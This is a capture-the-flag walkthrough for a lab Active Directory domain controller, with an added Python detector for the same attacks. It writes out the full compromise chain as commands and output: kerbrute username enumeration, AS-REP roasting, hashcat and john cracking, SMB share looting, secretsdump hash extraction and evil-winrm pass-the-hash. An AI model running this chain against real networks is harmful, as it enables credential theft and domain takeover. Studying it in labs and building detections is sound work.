| Room | Attacktive Directory |
|---|---|
| Target OS | Windows |
| Difficulty | Easy |
| Description | 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? |
| Maker | Sq00ky |
Reconnaissance
As always, the first step is the reconnaissance phase, starting with port scanning.
Ports Scanning
During this step we identify the target and see which services sit behind the IP address.
nmap -sC -sV -oA nmap 10.10.243.65
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-30 22:45:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2020-09-30T22:48:24+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-09-29T21:34:03
|_Not valid after: 2021-03-31T21:34:03
|_ssl-date: 2020-09-30T22:48:40+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/1%Time=5F750AAC%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerating Port 80
We can start by looking at the web server. It serves the default IIS page; we could run directory enumeration here, but this box is about Active Directory, so let's move on.
The scan revealed a DNS domain name, which we add to the hosts file:
echo 10.10.243.65 spookysec.local >> /etc/hosts
Enumerating SMB
Let's enumerate ports 139 and 445.
enum4linux
enum4linux -a spookysec.local
The Nmap output suggested our domain name was spookysec.local; enum4linux, however, shows THM-AD (the NetBIOS domain name).
enum4linux failed to provide much further information, such as a list of users.
kerbrute
kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
2020/10/01 04:50:02 > [+] VALID USERNAME: james@spookysec.local
2020/10/01 04:50:06 > [+] VALID USERNAME: svc-admin@spookysec.local
2020/10/01 04:50:12 > [+] VALID USERNAME: James@spookysec.local
2020/10/01 04:50:14 > [+] VALID USERNAME: robin@spookysec.local
2020/10/01 04:50:36 > [+] VALID USERNAME: darkstar@spookysec.local
2020/10/01 04:50:50 > [+] VALID USERNAME: administrator@spookysec.local
2020/10/01 04:51:28 > [+] VALID USERNAME: backup@spookysec.local
2020/10/01 04:51:41 > [+] VALID USERNAME: paradox@spookysec.local
2020/10/01 04:53:01 > [+] VALID USERNAME: JAMES@spookysec.local
2020/10/01 04:53:28 > [+] VALID USERNAME: Robin@spookysec.local
2020/10/01 04:56:11 > [+] VALID USERNAME: Administrator@spookysec.local
2020/10/01 05:02:01 > [+] VALID USERNAME: Darkstar@spookysec.local
2020/10/01 05:03:55 > [+] VALID USERNAME: Paradox@spookysec.local
2020/10/01 05:10:02 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2020/10/01 05:11:51 > [+] VALID USERNAME: ori@spookysec.local
2020/10/01 05:15:01 > [+] VALID USERNAME: ROBIN@spookysec.local
Exploiting Kerberos
We now want to obtain Active Directory passwords with AS-REP Roasting. This is an attack against Kerberos that targets user accounts which do not require pre-authentication: the KDC answers a plain AS-REQ for such an account with an AS-REP whose encrypted part is derived from the user's password, so it can be cracked offline.
python /opt/impacket/examples/GetNPUsers.py spookysec.local/ -usersfile valid-users.txt
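From the defender's side, the two steps above (kerbrute user enumeration and AS-REP roasting) leave a distinctive trail in Windows Security event 4768 (Kerberos TGT request) on the domain controller: a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN failures from one client, and a successful TGT issued with PreAuthType 0 and RC4 encryption. This added Python example, not part of the original writeup, runs that detection over constructed sample records; the field names follow event 4768, while the IPs, usernames and threshold are assumptions.

```python
"""Detect kerbrute-style user enumeration and AS-REP roasting in
Windows Security event 4768 (Kerberos TGT request) records.

Assumptions (not from the original page): events are already parsed into
dicts with the 4768 field names; the sample records below are constructed.
"""
from collections import defaultdict

ENUM_THRESHOLD = 5            # distinct unknown principals from one client (assumed)
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"
PREAUTH_NONE = "0"            # PreAuthType 0: no pre-authentication performed
ETYPE_RC4_HMAC = "0x17"       # RC4 etype, the one hashcat mode 18200 cracks

def detect_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """Return {client_ip: sorted unknown usernames} for clients that probed
    at least `threshold` distinct non-existent principals (KDC error 0x6)."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: sorted(names) for ip, names in unknown.items() if len(names) >= threshold}

def detect_asrep_roasting(events):
    """Return (ip, user) pairs where a TGT was issued without pre-authentication
    and with RC4 encryption, the combination an AS-REP roast request produces."""
    hits = []
    for e in events:
        if (e["EventID"] == 4768 and e["Status"] == "0x0"
                and e["PreAuthType"] == PREAUTH_NONE
                and e["TicketEncryptionType"] == ETYPE_RC4_HMAC):
            hits.append((e["IpAddress"], e["TargetUserName"]))
    return hits

def _ev(user, ip, status, preauth="2", etype="0x12"):
    # Defaults model a normal logon: timestamp pre-auth (type 2), AES256 (0x12).
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample: one client guessing names, then roasting svc-admin,
# plus an ordinary AES logon from a different workstation.
SAMPLE_EVENTS = [
    _ev("alice", "10.10.14.5", "0x6"), _ev("bob", "10.10.14.5", "0x6"),
    _ev("carol", "10.10.14.5", "0x6"), _ev("dave", "10.10.14.5", "0x6"),
    _ev("erin", "10.10.14.5", "0x6"), _ev("james", "10.10.14.5", "0x0"),
    _ev("svc-admin", "10.10.14.5", "0x0", preauth="0", etype="0x17"),
    _ev("robin", "10.10.243.50", "0x0"),
]

if __name__ == "__main__":
    print(detect_user_enumeration(SAMPLE_EVENTS))   # one noisy client
    print(detect_asrep_roasting(SAMPLE_EVENTS))     # [('10.10.14.5', 'svc-admin')]
```

The same RC4/no-pre-auth combination is what auditing for the "Do not require Kerberos preauthentication" flag on accounts prevents in the first place.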
Cracking
Let's crack the hash with hashcat and then log in to SMB.
hashcat -m 18200 svc-admin.txt /usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt --force
"-m 18200" specifies the hash mode we want to use (Kerberos 5 AS-REP etype 23). See the Hashcat wiki for the full list of modes when cracking hash values.
Alternatively, you can use john.
john svc-admin.txt --wordlist=/usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt
Running john or hashcat will give us a password.
Enumerating the DC (Domain Controller)
With the password recovered in the previous step, we use those credentials to list the SMB shares.
smbclient -L //10.10.225.20/ --user svc-admin
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
We found several shares, and backup looks interesting.
Inside the backup share we find the file backup_credentials.txt.
Let's take a look at what it contains: a base64-encoded string.
Decoding it gives another set of credentials, this time for the user backup.
Elevating Privileges
python secretsdump.py -just-dc backup@spookysec.local
The dump reveals the Administrator NTLM hash. We can now either crack the hash or pass it to evil-winrm to connect as Administrator.
./evil-winrm.rb -i 10.10.225.20 -u Administrator -H (HASH HERE)